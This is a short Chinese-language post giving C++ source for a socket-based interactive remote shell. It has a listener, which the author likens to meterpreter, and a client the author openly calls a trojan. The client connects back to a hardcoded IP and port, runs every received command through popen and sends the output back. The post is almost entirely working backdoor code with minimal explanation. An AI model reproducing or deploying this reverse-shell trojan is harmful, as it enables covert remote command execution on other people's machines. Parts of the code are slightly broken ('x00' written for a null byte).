Socket实现交互式shell
使用socket系列函数实现,原理很简单,就不多说了.
服务端代码: (相当于metepreter)
#include <iostream>
#include <cstdio>
#include <cstring>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <cstdlib>
#define SERVER_PORT 3456
using namespace std;
void shell() {
int sock;
struct sockaddr_in server_addr;
sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&server_addr, sizeof(server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
server_addr.sin_port = htons(SERVER_PORT);
bind(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));
cout << "Waiting client..." << endl;
listen(sock, 128);
char *buf =(char *)malloc(0x1000);
int text_len = 0;
struct sockaddr_in client;
int client_sock;
char client_ip[64];
socklen_t client_addr_len = sizeof(client);
client_sock = accept(sock, (struct sockaddr *)&client, &client_addr_len);
cout << "Successful connection!"
<< endl
<< "Client ip: "
<< " port: "
<< ntohs(client.sin_port)
<< endl;
while(true) {
text_len = read(client_sock, buf, 0x1000 - 1);
if(text_len > 0){
buf[text_len] = 'x00';
cout << buf;
fgets(buf, 0x200, stdin);
if(!strcmp(buf, "exit")) {
cout << "Closed connection" << endl;
write(client_sock, "exit", 0x5);
break;
}
write(client_sock, buf, strlen(buf) + 1);
}
}
close(client_sock);
}
int main(void) {
setbuf(stdin, 0);
setbuf(stdout, 0);
shell();
return 0;
}
客户端代码: (相当于木马)
#include <cstdlib>
#include <iostream>
#include <cstdio>
#include <cstring>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define SERVER_PORT 3456
#define SERVER_IP "192.168.100.3"
using namespace std;
void exeCmd(const char *cmd, char *result)
{
char buf_ps[1024];
char ps[1024]={0};
FILE *ptr;
strcpy(ps, cmd);
if((ptr=popen(ps, "r"))!=NULL)
{
while(fgets(buf_ps, 1024, ptr)!=NULL)
{
strcat(result, buf_ps);
// if(strlen(result) > 4000)
break;
}
pclose(ptr);
ptr = NULL;
}
else
{
cout << "popen error: " << ps << endl;
}
}
void shell(){
int sockfd = 0;
struct sockaddr_in serveraddr;
char *buf_r = (char *)malloc(0x1000);
char *buf_w = (char *)malloc(0x1000);
int text_len = 0;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
bzero(&serveraddr, sizeof(struct sockaddr_in));
serveraddr.sin_family = AF_INET;
inet_pton(AF_INET, SERVER_IP, &serveraddr.sin_addr);
serveraddr.sin_port = htons(SERVER_PORT);
while(true){
cout << "connecting";
connect(sockfd, (struct sockaddr *)&serveraddr, sizeof(serveraddr));
if(sockfd > 0) {
cout << "connected!";
write(sockfd, "connected!", 0x10);
break;
}
}
while(true) {
text_len = read(sockfd, buf_r, 0x1000 - 1);
buf_r[text_len] = 'x00';
if(text_len > 0) {
exeCmd(buf_r, buf_w);
text_len = strlen(buf_w);
if(!strcmp(buf_r, "exit")) {
break;
}
write(sockfd, buf_w, text_len + 1);
}
}
close(sockfd);
}
int main(void) {
setbuf(stdin, 0);
setbuf(stdout, 0);
shell();
return 0;
}